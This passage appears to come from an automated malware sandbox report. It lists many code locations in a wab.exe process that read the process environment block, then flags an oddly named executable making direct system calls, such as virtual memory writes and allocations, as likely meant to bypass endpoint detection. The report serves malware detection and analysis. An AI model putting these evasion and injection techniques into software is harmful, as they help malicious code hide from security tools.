Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h] 15_2_23B41070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5C073 mov eax, dword ptr fs:[00000030h] 15_2_23B5C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAD070 mov ecx, dword ptr fs:[00000030h] 15_2_23BAD070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB106E mov eax, dword ptr fs:[00000030h] 15_2_23BB106E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B32050 mov eax, dword ptr fs:[00000030h] 15_2_23B32050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BD705E mov ebx, dword ptr fs:[00000030h] 15_2_23BD705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BD705E mov eax, dword ptr fs:[00000030h] 15_2_23BD705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5B052 mov eax, dword ptr fs:[00000030h] 15_2_23B5B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB6050 mov eax, dword ptr fs:[00000030h] 15_2_23BB6050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5D7B0 mov eax, dword ptr fs:[00000030h] 15_2_23B5D7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h] 15_2_23B2F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB97A9 mov eax, dword ptr fs:[00000030h] 15_2_23BB97A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h] 15_2_23BBF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h] 15_2_23BBF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h] 15_2_23BBF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h] 15_2_23BBF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h] 15_2_23BBF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B307AF mov eax, dword ptr fs:[00000030h] 15_2_23B307AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF78A mov eax, dword ptr fs:[00000030h] 15_2_23BEF78A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B347FB mov eax, dword ptr fs:[00000030h] 15_2_23B347FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B347FB mov eax, dword ptr fs:[00000030h] 15_2_23B347FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3D7E0 mov ecx, dword ptr fs:[00000030h] 15_2_23B3D7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B527ED mov eax, dword ptr fs:[00000030h] 15_2_23B527ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B527ED mov eax, dword ptr fs:[00000030h] 15_2_23B527ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B527ED mov eax, dword ptr fs:[00000030h] 15_2_23B527ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3C7C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B357C0 mov eax, dword ptr fs:[00000030h] 15_2_23B357C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B357C0 mov eax, dword ptr fs:[00000030h] 15_2_23B357C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B357C0 mov eax, dword ptr fs:[00000030h] 15_2_23B357C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C037B6 mov eax, dword ptr fs:[00000030h] 15_2_23C037B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB07C3 mov eax, dword ptr fs:[00000030h] 15_2_23BB07C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29730 mov eax, dword ptr fs:[00000030h] 15_2_23B29730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B29730 mov eax, dword ptr fs:[00000030h] 15_2_23B29730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B65734 mov eax, dword ptr fs:[00000030h] 15_2_23B65734
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3973A mov eax, dword ptr fs:[00000030h] 15_2_23B3973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3973A mov eax, dword ptr fs:[00000030h] 15_2_23B3973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C03749 mov eax, dword ptr fs:[00000030h] 15_2_23C03749
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6273C mov eax, dword ptr fs:[00000030h] 15_2_23B6273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6273C mov ecx, dword ptr fs:[00000030h] 15_2_23B6273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6273C mov eax, dword ptr fs:[00000030h] 15_2_23B6273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAC730 mov eax, dword ptr fs:[00000030h] 15_2_23BAC730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF72E mov eax, dword ptr fs:[00000030h] 15_2_23BEF72E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B33720 mov eax, dword ptr fs:[00000030h] 15_2_23B33720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4F720 mov eax, dword ptr fs:[00000030h] 15_2_23B4F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4F720 mov eax, dword ptr fs:[00000030h] 15_2_23B4F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4F720 mov eax, dword ptr fs:[00000030h] 15_2_23B4F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF972B mov eax, dword ptr fs:[00000030h] 15_2_23BF972B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6C720 mov eax, dword ptr fs:[00000030h] 15_2_23B6C720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6C720 mov eax, dword ptr fs:[00000030h] 15_2_23B6C720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B30710 mov eax, dword ptr fs:[00000030h] 15_2_23B30710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B60710 mov eax, dword ptr fs:[00000030h] 15_2_23B60710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6F71F mov eax, dword ptr fs:[00000030h] 15_2_23B6F71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6F71F mov eax, dword ptr fs:[00000030h] 15_2_23B6F71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B37703 mov eax, dword ptr fs:[00000030h] 15_2_23B37703
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B35702 mov eax, dword ptr fs:[00000030h] 15_2_23B35702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B35702 mov eax, dword ptr fs:[00000030h] 15_2_23B35702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6C700 mov eax, dword ptr fs:[00000030h] 15_2_23B6C700
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B38770 mov eax, dword ptr fs:[00000030h] 15_2_23B38770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h] 15_2_23B40770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h] 15_2_23B2B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h] 15_2_23B2B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h] 15_2_23B2B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h] 15_2_23B2B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B30750 mov eax, dword ptr fs:[00000030h] 15_2_23B30750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72750 mov eax, dword ptr fs:[00000030h] 15_2_23B72750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72750 mov eax, dword ptr fs:[00000030h] 15_2_23B72750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB4755 mov eax, dword ptr fs:[00000030h] 15_2_23BB4755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B43740 mov eax, dword ptr fs:[00000030h] 15_2_23B43740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B43740 mov eax, dword ptr fs:[00000030h] 15_2_23B43740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B43740 mov eax, dword ptr fs:[00000030h] 15_2_23B43740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6674D mov esi, dword ptr fs:[00000030h] 15_2_23B6674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6674D mov eax, dword ptr fs:[00000030h] 15_2_23B6674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6674D mov eax, dword ptr fs:[00000030h] 15_2_23B6674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h] 15_2_23C0B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h] 15_2_23C0B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h] 15_2_23C0B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h] 15_2_23C0B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B276B2 mov eax, dword ptr fs:[00000030h] 15_2_23B276B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B276B2 mov eax, dword ptr fs:[00000030h] 15_2_23B276B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B276B2 mov eax, dword ptr fs:[00000030h] 15_2_23B276B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B666B0 mov eax, dword ptr fs:[00000030h] 15_2_23B666B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6C6A6 mov eax, dword ptr fs:[00000030h] 15_2_23B6C6A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2D6AA mov eax, dword ptr fs:[00000030h] 15_2_23B2D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2D6AA mov eax, dword ptr fs:[00000030h] 15_2_23B2D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B34690 mov eax, dword ptr fs:[00000030h] 15_2_23B34690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B34690 mov eax, dword ptr fs:[00000030h] 15_2_23B34690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h] 15_2_23BB368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h] 15_2_23BB368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h] 15_2_23BB368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h] 15_2_23BB368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h] 15_2_23BAE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h] 15_2_23BAE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h] 15_2_23BAE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h] 15_2_23BAE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB06F1 mov eax, dword ptr fs:[00000030h] 15_2_23BB06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BB06F1 mov eax, dword ptr fs:[00000030h] 15_2_23BB06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BED6F0 mov eax, dword ptr fs:[00000030h] 15_2_23BED6F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h] 15_2_23BC36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h] 15_2_23BC36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h] 15_2_23BC36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h] 15_2_23BC36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h] 15_2_23BC36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h] 15_2_23BC36EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5D6E0 mov eax, dword ptr fs:[00000030h] 15_2_23B5D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B5D6E0 mov eax, dword ptr fs:[00000030h] 15_2_23B5D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6A6C7 mov ebx, dword ptr fs:[00000030h] 15_2_23B6A6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6A6C7 mov eax, dword ptr fs:[00000030h] 15_2_23B6A6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h] 15_2_23B3B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h] 15_2_23BF16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h] 15_2_23BF16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h] 15_2_23BF16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h] 15_2_23BF16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BEF6C7 mov eax, dword ptr fs:[00000030h] 15_2_23BEF6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B616CF mov eax, dword ptr fs:[00000030h] 15_2_23B616CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4E627 mov eax, dword ptr fs:[00000030h] 15_2_23B4E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h] 15_2_23B2F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B66620 mov eax, dword ptr fs:[00000030h] 15_2_23B66620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B68620 mov eax, dword ptr fs:[00000030h] 15_2_23B68620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B3262C mov eax, dword ptr fs:[00000030h] 15_2_23B3262C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B33616 mov eax, dword ptr fs:[00000030h] 15_2_23B33616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B33616 mov eax, dword ptr fs:[00000030h] 15_2_23B33616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72619 mov eax, dword ptr fs:[00000030h] 15_2_23B72619
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B61607 mov eax, dword ptr fs:[00000030h] 15_2_23B61607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23BAE609 mov eax, dword ptr fs:[00000030h] 15_2_23BAE609
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B6F603 mov eax, dword ptr fs:[00000030h] 15_2_23B6F603
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B4260B mov eax, dword ptr fs:[00000030h] 15_2_23B4260B

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtOpenKeyEx: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQueryAttributesFile: Direct from: 0x76F02E6C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQuerySystemInformation: Direct from: 0x76F048CC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtOpenSection: Direct from: 0x76F02E0C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtSetInformationThread: Direct from: 0x76EF63F9 Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtQueryValueKey: Direct from: 0x76F02BEC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtCreateFile: Direct from: 0x76F02FEC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtOpenFile: Direct from: 0x76F02DCC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtOpenKeyEx: Direct from: 0x76F02B9C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtSetInformationProcess: Direct from: 0x76F02C5C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtCreateMutant: Direct from: 0x76F035CC Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtMapViewOfSection: Direct from: 0x76F02D1C Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC Jump to behavior
